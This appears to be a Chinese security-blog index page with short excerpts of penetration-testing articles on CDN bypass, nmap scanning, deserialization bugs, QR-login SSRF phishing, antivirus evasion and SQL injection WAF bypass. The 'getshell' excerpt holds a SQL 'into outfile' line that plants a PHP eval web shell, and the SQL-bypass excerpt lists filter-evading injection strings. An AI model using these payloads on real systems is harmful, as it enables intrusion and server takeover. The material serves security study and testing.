0x01 前言
随着小程序的火爆,越来越多的企业开始开发自身的小程序,小程序便成了我们挖洞的一个切入点。常用的平台有微信、支付宝、百度app等。日常渗透、众测中经常会遇到小程序,在获取到小程序客户端源码的情况下,对于Bypass数据包签名、GET敏感接口等都有一定的帮助。这里对最常遇到的微信小程序、支付宝小程序的源码反编译做个方法记录。
0x02 需要的准备
安卓手机(需ROOT)
PC安装adb套件
0x03 ...
绕过CDN寻找真实IP的8种方法
正常情况下,通过cmd命令可以快速找到域名对应IP,最常见的命令如ping、nslookup。但很多站点出于用户体验和安全的角度,使用CDN加速,将域名解析到CDN,这时候就需要绕过CDN来查找真实IP。
一、DNS历史解析记录
查询域名的历史解析记录,可能会找到网站使用CDN前的解析记录,从而获取真实ip,相关查询的网站有:
iphistory:https://viewdns.info/iphistory/DNS查询:(https://dnsdb.io/zh-cn/...
nmap小技巧[1] 探测大网络空间中的存活主机
nmap是所有安全爱好者应该熟练掌握的扫描工具,本篇介绍其在扫描大网络空间时的用法。
为什么要扫描大网络空间呢? 有这样的情形:
内网渗透 攻击者单点突破,进入内网后,需进一步扩大成果,可以先扫描整个私有网络空间,发现哪些主机是有利用价值的,例如10.1.1.1/8, 172.16.1.1/12, 192.168.1.1/16
全网扫描
扫描一个巨大的网络空间,我们最关心的是效率问题,即时间成本。 在足够迅速的前提下,宁...
PHP反序列化漏洞学习(一)
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞的基础知识。
一、PHP序列化和反序列化
在学习PHP反序列化漏洞时,先来了解一下基础的知识。
(一)PHP序列化
函数 : serialize()
所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。
序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
一开始看这个概...
Fastjson 反序列化漏洞史
作者:Longofo@知道创宇404实验室
时间:2020年4月27日
英文版本:https://paper.seebug.org/1193/
Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。
Fastjson解析流程
可...
QQ二维码登陆机制分析+双重SSRF钓鱼利用
前言1:上次发了QQ邮箱self-xss的综合利用链,因为之前提交了TSRC,看了已经修复才把漏洞细节发出来的,然后被扣了安全币和积分。由于没认真看条款在这先道个歉。
前言2:随着移动应用的普及,二维码在我们的日常生活中显得越来越重要。其中二维码有一个功能用于移动端和PC端的交互认证。随着新事物的出现,新的漏洞也有可能随之出现。要想挖到新漏洞就得先弄清他的原理。
一、抓包分析
既然二维码认证是基...
红队-Getshell总结
Author: sm0nk@深蓝攻防实验室
无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
0x01 注入getshell
一般前提条件:有权限、知道路径
mysql
select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'
Sql server...
使用Python进行防病毒免杀
使用Python进行防病毒免杀
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?
打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。
0x01 环境准备
1、软件安装
Python 2.7.16 x86:https://www.p...
高级SQL注入:混淆和绕过
最近在学习代码审计,于是发现了这篇文章,然后转过来学习学习, 并稍加了修改
也不知道这位大哥转的谁的文章,也没有附上原文链接,
转发地址:https://blog.csdn.net/ncafei/article/details/62044552
简介:
本文将要揭示能用于现实CMSs和WAFs程序中的高级绕过技术和混淆技术,
文中所提到的SQL注入语句仅仅是一些绕过保护的方法,
另外本文所有内容仅可用于安全研究,如有其它不正当的行为,后果自负...
SQL注入-绕过
整理下关于SQL注入绕过的一些姿势。欢迎大牛补充 !^—^!
0x01 绕过waf思路
从第一步起,一点一点去分析,然后绕过。
过滤 and,or
1
2
3
preg_match('/(and|or)/i', $id)
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1
过滤 and, or, union
1
2
3
preg_match('/(and|or|union)/i', $id)
Filtered injection: union select user...